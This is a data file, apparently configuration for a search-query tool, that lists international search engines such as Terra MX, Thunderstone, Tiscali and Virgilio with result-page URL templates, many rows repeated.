"International","Terra MX 2 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=11&ud4=0&qm=0","0"
"International","Terra MX 2 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=11&ud4=0&qm=0","0"
"International","Terra MX 2 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=11&ud4=0&qm=0","0"
"International","Terra MX 2 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=11&ud4=0&qm=0","0"
"International","Terra MX 2 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=11&ud4=0&qm=0","0"
"International","Terra MX 3 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=21&ud4=0&qm=0","1"
"International","Terra MX 3 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=21&ud4=0&qm=0","0"
"International","Terra MX 3 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=21&ud4=0&qm=0","0"
"International","Terra MX 3 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=21&ud4=0&qm=0","0"
"International","Terra MX 3 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=21&ud4=0&qm=0","0"
"International","Terra MX 3 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=21&ud4=0&qm=0","0"
"International","Terra MX 4 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=31&ud4=0&qm=0","1"
"International","Terra MX 4 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=31&ud4=0&qm=0","0"
"International","Terra MX 4 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=31&ud4=0&qm=0","0"
"International","Terra MX 4 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=31&ud4=0&qm=0","0"
"International","Terra MX 4 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=31&ud4=0&qm=0","0"
"International","Terra MX 4 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=31&ud4=0&qm=0","0"
"International","Terra MX 5 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=41&ud4=0&qm=0","1"
"International","Terra MX 5 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=41&ud4=0&qm=0","0"
"International","Terra MX 5 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=41&ud4=0&qm=0","0"
"International","Terra MX 5 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=41&ud4=0&qm=0","0"
"International","Terra MX 5 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=41&ud4=0&qm=0","0"
"International","Terra MX 5 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=41&ud4=0&qm=0","0"
"International","Thunderstone","http://search.thunderstone.com/texis/websearch/?q={SEARCH_KEYWORD}&c=","1"
"International","Thunderstone","http://search.thunderstone.com/texis/websearch/?q={SEARCH_KEYWORD}&c=","0"
"International","Thunderstone","http://search.thunderstone.com/texis/websearch/?q={SEARCH_KEYWORD}&c=","0"
"International","Thunderstone","http://search.thunderstone.com/texis/websearch/?q={SEARCH_KEYWORD}&c=","0"
"International","Thunderstone","http://search.thunderstone.com/texis/websearch/?q={SEARCH_KEYWORD}&c=","0"
"International","Thunderstone","http://search.thunderstone.com/texis/websearch/?q={SEARCH_KEYWORD}&c=","0"
"International","Thunderstone 2 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=20&q={SEARCH_KEYWORD}","1"
"International","Thunderstone 2 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=20&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 2 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=20&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 2 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=20&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 2 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=20&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 2 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=20&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 3 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=40&q={SEARCH_KEYWORD}","1"
"International","Thunderstone 3 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=40&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 3 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=40&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 3 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=40&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 3 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=40&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 3 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=40&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 4 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=60&q={SEARCH_KEYWORD}","1"
"International","Thunderstone 4 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=60&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 4 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=60&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 4 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=60&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 4 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=60&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 4 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=60&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 5 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=80&q={SEARCH_KEYWORD}","1"
"International","Thunderstone 5 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=80&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 5 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=80&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 5 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=80&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 5 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=80&q={SEARCH_KEYWORD}","0"
"International","Thunderstone 5 (Next 20)","http://search.thunderstone.com/texis/websearch/?c=&sn=80&q={SEARCH_KEYWORD}","0"
"International","Tiscali FR","http://rechercher.nomade.tiscali.fr/recherche.asp?MT={SEARCH_KEYWORD}&s={SEARCH_KEYWORD}&opt=0","1"
"International","Tiscali FR","http://rechercher.nomade.tiscali.fr/recherche.asp?MT={SEARCH_KEYWORD}&s={SEARCH_KEYWORD}&opt=0","0"
"International","Tiscali FR","http://rechercher.nomade.tiscali.fr/recherche.asp?MT={SEARCH_KEYWORD}&s={SEARCH_KEYWORD}&opt=0","0"
"International","Tiscali FR","http://rechercher.nomade.tiscali.fr/recherche.asp?MT={SEARCH_KEYWORD}&s={SEARCH_KEYWORD}&opt=0","0"
"International","Tiscali FR","http://rechercher.nomade.tiscali.fr/recherche.asp?MT={SEARCH_KEYWORD}&s={SEARCH_KEYWORD}&opt=0","0"
"International","Tiscali FR","http://rechercher.nomade.tiscali.fr/recherche.asp?MT={SEARCH_KEYWORD}&s={SEARCH_KEYWORD}&opt=0","0"
"International","Tiscali FR 2 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=2","1"
"International","Tiscali FR 2 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=2","0"
"International","Tiscali FR 2 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=2","0"
"International","Tiscali FR 2 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=2","0"
"International","Tiscali FR 2 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=2","0"
"International","Tiscali FR 2 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=2","0"
"International","Tiscali FR 3 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=3","1"
"International","Tiscali FR 3 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=3","0"
"International","Tiscali FR 3 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=3","0"
"International","Tiscali FR 3 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=3","0"
"International","Tiscali FR 3 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=3","0"
"International","Tiscali FR 3 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=3","0"
"International","Tiscali FR 4 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=4","1"
"International","Tiscali FR 4 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=4","0"
"International","Tiscali FR 4 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=4","0"
"International","Tiscali FR 4 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=4","0"
"International","Tiscali FR 4 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=4","0"
"International","Tiscali FR 4 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=4","0"
"International","Tiscali FR 5 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=5","1"
"International","Tiscali FR 5 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=5","0"
"International","Tiscali FR 5 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=5","0"
"International","Tiscali FR 5 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=5","0"
"International","Tiscali FR 5 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=5","0"
"International","Tiscali FR 5 (Next 10)","http://rechercher.nomade.tiscali.fr/recherche.asp?s={SEARCH_KEYWORD}&opt=0&affopt=0&en=6&pg=5","0"
"International","Tiscali IT","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&external=1&collection=it&offset=0&pg=1","1"
"International","Tiscali IT","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&external=1&collection=it&offset=0&pg=1","0"
"International","Tiscali IT","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&external=1&collection=it&offset=0&pg=1","0"
"International","Tiscali IT","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&external=1&collection=it&offset=0&pg=1","0"
"International","Tiscali IT","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&external=1&collection=it&offset=0&pg=1","0"
"International","Tiscali IT","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&external=1&collection=it&offset=0&pg=1","0"
"International","Tiscali IT 2 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=2&offset=10&external=0&xargs=","1"
"International","Tiscali IT 2 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=2&offset=10&external=0&xargs=","1"
"International","Tiscali IT 2 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=2&offset=10&external=0&xargs=","0"
"International","Tiscali IT 2 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=2&offset=10&external=0&xargs=","0"
"International","Tiscali IT 2 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=2&offset=10&external=0&xargs=","0"
"International","Tiscali IT 2 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=2&offset=10&external=0&xargs=","0"
"International","Tiscali IT 3 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=3&offset=20&external=0&xargs=","1"
"International","Tiscali IT 3 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=3&offset=20&external=0&xargs=","0"
"International","Tiscali IT 3 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=3&offset=20&external=0&xargs=","0"
"International","Tiscali IT 3 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=3&offset=20&external=0&xargs=","0"
"International","Tiscali IT 3 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=3&offset=20&external=0&xargs=","0"
"International","Tiscali IT 3 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=3&offset=20&external=0&xargs=","0"
"International","Tiscali IT 4 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=4&offset=30&external=0&xargs=","1"
"International","Tiscali IT 4 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=4&offset=30&external=0&xargs=","0"
"International","Tiscali IT 4 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=4&offset=30&external=0&xargs=","0"
"International","Tiscali IT 4 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=4&offset=30&external=0&xargs=","0"
"International","Tiscali IT 4 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=4&offset=30&external=0&xargs=","0"
"International","Tiscali IT 4 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=4&offset=30&external=0&xargs=","0"
"International","Tiscali IT 5 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=5&offset=40&external=0&xargs=","1"
"International","Tiscali IT 5 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=5&offset=40&external=0&xargs=","0"
"International","Tiscali IT 5 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=5&offset=40&external=0&xargs=","0"
"International","Tiscali IT 5 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=5&offset=40&external=0&xargs=","0"
"International","Tiscali IT 5 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=5&offset=40&external=0&xargs=","0"
"International","Tiscali IT 5 (Next 10)","http://search-dyn.tiscali.it/search.php?key={SEARCH_KEYWORD}&tiscalitype=web&hits=10&language=it&collection=it&pg=5&offset=40&external=0&xargs=","0"
"International","Tiscali UK","http://www.tiscali.co.uk/search/results.php?from=&query={SEARCH_KEYWORD}","1"
"International","Tiscali UK","http://www.tiscali.co.uk/search/results.php?from=&query={SEARCH_KEYWORD}","0"
"International","Tiscali UK","http://www.tiscali.co.uk/search/results.php?from=&query={SEARCH_KEYWORD}","0"
"International","Tiscali UK","http://www.tiscali.co.uk/search/results.php?from=&query={SEARCH_KEYWORD}","0"
"International","Tiscali UK","http://www.tiscali.co.uk/search/results.php?from=&query={SEARCH_KEYWORD}","0"
"International","Tiscali UK","http://www.tiscali.co.uk/search/results.php?from=&query={SEARCH_KEYWORD}","0"
"International","Virgilio","http://search.virgilio.it/search/cgi/search.cgi?vrs=0&db=v&op=and&qs={SEARCH_KEYWORD}&l=XX&cerca.x=21&cerca.y=6","1"
"International","Virgilio","http://search.virgilio.it/search/cgi/search.cgi?vrs=0&db=v&op=and&qs={SEARCH_KEYWORD}&l=XX&cerca.x=21&cerca.y=6","0"
"International","Virgilio","http://search.virgilio.it/search/cgi/search.cgi?vrs=0&db=v&op=and&qs={SEARCH_KEYWORD}&l=XX&cerca.x=21&cerca.y=6","0"
"International","Virgilio","http://search.virgilio.it/search/cgi/search.cgi?vrs=0&db=v&op=and&qs={SEARCH_KEYWORD}&l=XX&cerca.x=21&cerca.y=6","0"
"International","Virgilio","http://search.virgilio.it/search/cgi/search.cgi?vrs=0&db=v&op=and&qs={SEARCH_KEYWORD}&l=XX&cerca.x=21&cerca.y=6","0"
"International","Virgilio","http://search.virgilio.it/search/cgi/search.cgi?vrs=0&db=v&op=and&qs={SEARCH_KEYWORD}&l=XX&cerca.x=21&cerca.y=6","0"
"International","Virgilio 2 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=10&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","1"
"International","Virgilio 2 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=10&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 2 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=10&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 2 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=10&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 2 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=10&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 2 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=10&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 3 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=20&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","1"
"International","Virgilio 3 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=20&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 3 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=20&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 3 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=20&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 3 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=20&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 3 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=20&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 4 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=30&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","1"
"International","Virgilio 4 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=30&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 4 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=30&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 4 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=30&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 4 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=30&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 4 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=30&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 5 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=40&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","1"
"International","Virgilio 5 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=40&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 5 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=40&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 5 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=40&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 5 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=40&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Virgilio 5 (Next 10)","http://search.virgilio.it/search/cgi/search.cgi?db=gg&ly=vs&vrs=40&vrg=10&qs={SEARCH_KEYWORD}&op=and&cb=&vcc=0&dir=&l=XX&v_g=1&aut=1&tric=base&n=0&dpg=n&dv=&pg=0&iq=000212487228016109000838&hx=&dpglnk=n&rl=&es=0","0"
"International","Voila","http://search.ke.voila.fr/S/voila?kw={SEARCH_KEYWORD}&dt=*","1"
"International","Voila","http://search.ke.voila.fr/S/voila?kw={SEARCH_KEYWORD}&dt=*","0"
"International","Voila","http://search.ke.voila.fr/S/voila?kw={SEARCH_KEYWORD}&dt=*","0"
"International","Voila","http://search.ke.voila.fr/S/voila?kw={SEARCH_KEYWORD}&dt=*","0"
"International","Voila","http://search.ke.voila.fr/S/voila?kw={SEARCH_KEYWORD}&dt=*","0"
"International","Voila","http://search.ke.voila.fr/S/voila?kw={SEARCH_KEYWORD}&dt=*","0"
"International","Voila 2 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=11&dd=web&an=10","1"
"International","Voila 2 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=11&dd=web&an=10","0"
